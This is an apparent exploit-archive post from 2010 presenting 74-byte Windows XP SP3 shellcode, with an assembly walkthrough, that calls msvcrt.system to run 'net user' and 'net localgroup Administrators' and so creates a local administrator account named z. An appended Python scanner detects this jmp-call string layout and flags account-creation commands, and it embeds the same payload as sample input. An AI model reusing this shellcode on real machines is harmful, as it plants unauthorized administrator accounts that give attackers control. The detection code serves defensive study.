[win32] - win32/xp sp3 (ru) add local administrator in 74 bytes
Posted on 16 October 2010
=====================================================
win32/xp sp3 (ru) add local administrator in 74 bytes
=====================================================

by lord Kelvin

"\xEB\x08\xB8\xC7\x93\xC1\x77\xFF\xD0\xCC\xE8\xF3\xFF\xFF\xFFcmd /cnet/add user z z&net/add localgroup Administrators z"

First we jump to a call, which pushes the address of our command string onto the stack, and then we execute it with the system() function. You'd better check its address on your machine before running (the listing hardcodes 77C193C7 as msvcrt.system). A breakpoint (int 3) is used to prevent infinite looping. The command is slightly optimized, to save something near 10 bytes of space. The result: you get a z:z user with Administrative privileges. The last zero byte is essential.

```asm
xxx:    EB 08           jmp  xxx+0A        ; the magic begins
xxx+02: B8 C793C177     mov  eax,77C193C7  ; call msvcrt.system
xxx+07: FF D0           call eax           ; /
xxx+09: CC              int  3             ; pause ;)
xxx+0A: E8 F3FFFFFF     call xxx+02        ; push xxx+0F
xxx+0F: db 'cmd /cnet/add user z z&net/add localgroup Administrators z',0
```

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-10-16]
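As an added example (not part of the original post), a Python scanner that recognizes the layout the listing uses, a short forward jmp over a stub, a backward call that leaves the string's address on the stack, and the NUL-terminated command string, and pulls that string out so it can be matched against account-creation commands. The escape parser and the `ADMIN_ADD_RE` pattern are my own assumptions; the sample input is the page's 74-byte blob.

```python
import re
import struct

# Sample input: the page's 74-byte blob as printed (code bytes as \xHH, then the
# command string); the trailing NUL the page calls essential is appended by callers.
PAGE_SHELLCODE = (
    r"\xEB\x08\xB8\xC7\x93\xC1\x77\xFF\xD0\xCC\xE8\xF3\xFF\xFF\xFF"
    "cmd /cnet/add user z z&net/add localgroup Administrators z"
)

# Constructed pattern: net user/localgroup with /add before the subcommand
# (the page's compact form) or after it (the usual form).
ADMIN_ADD_RE = re.compile(
    r"net(?:\s*/add\s+(?:user|localgroup)\b|\s+(?:user|localgroup)\b[^&|\r\n]*/add)",
    re.IGNORECASE,
)

def unescape_shellcode(text):
    """Turn the \\xHH-plus-literal notation into raw bytes (literals as latin-1)."""
    out, i = bytearray(), 0
    while i < len(text):
        if re.match(r"\\x[0-9A-Fa-f]{2}", text[i:i + 4]):
            out.append(int(text[i + 2:i + 4], 16))
            i += 4
        else:
            out.append(ord(text[i]) & 0xFF)
            i += 1
    return bytes(out)

def find_jmp_call_strings(buf):
    """Return (jmp_off, stub_off, string) for each 'EB fwd; stub; E8 back; string' layout."""
    hits = []
    for i in range(len(buf) - 1):
        if buf[i] != 0xEB or buf[i + 1] >= 0x80:   # forward short jmp only
            continue
        call_at = i + 2 + buf[i + 1]               # jmp target must be an E8
        if call_at + 5 > len(buf) or buf[call_at] != 0xE8:
            continue
        rel32 = struct.unpack_from("<i", buf, call_at + 1)[0]
        if call_at + 5 + rel32 != i + 2:           # call must land on the stub
            continue
        end = buf.find(b"\x00", call_at + 5)       # string pushed by the call
        chunk = buf[call_at + 5:end] if end != -1 else b""
        if chunk and all(0x20 <= b < 0x7F for b in chunk):
            hits.append((i, i + 2, chunk.decode("ascii")))
    return hits

def flagged_commands(buf):
    """Pushed strings that look like local account creation or group elevation."""
    return [s for _, _, s in find_jmp_call_strings(buf) if ADMIN_ADD_RE.search(s)]
```

Run `flagged_commands(unescape_shellcode(PAGE_SHELLCODE) + b"\x00")` to see the page's command string recovered from the blob; the same scanner reports nothing for the benign layout with an innocuous string.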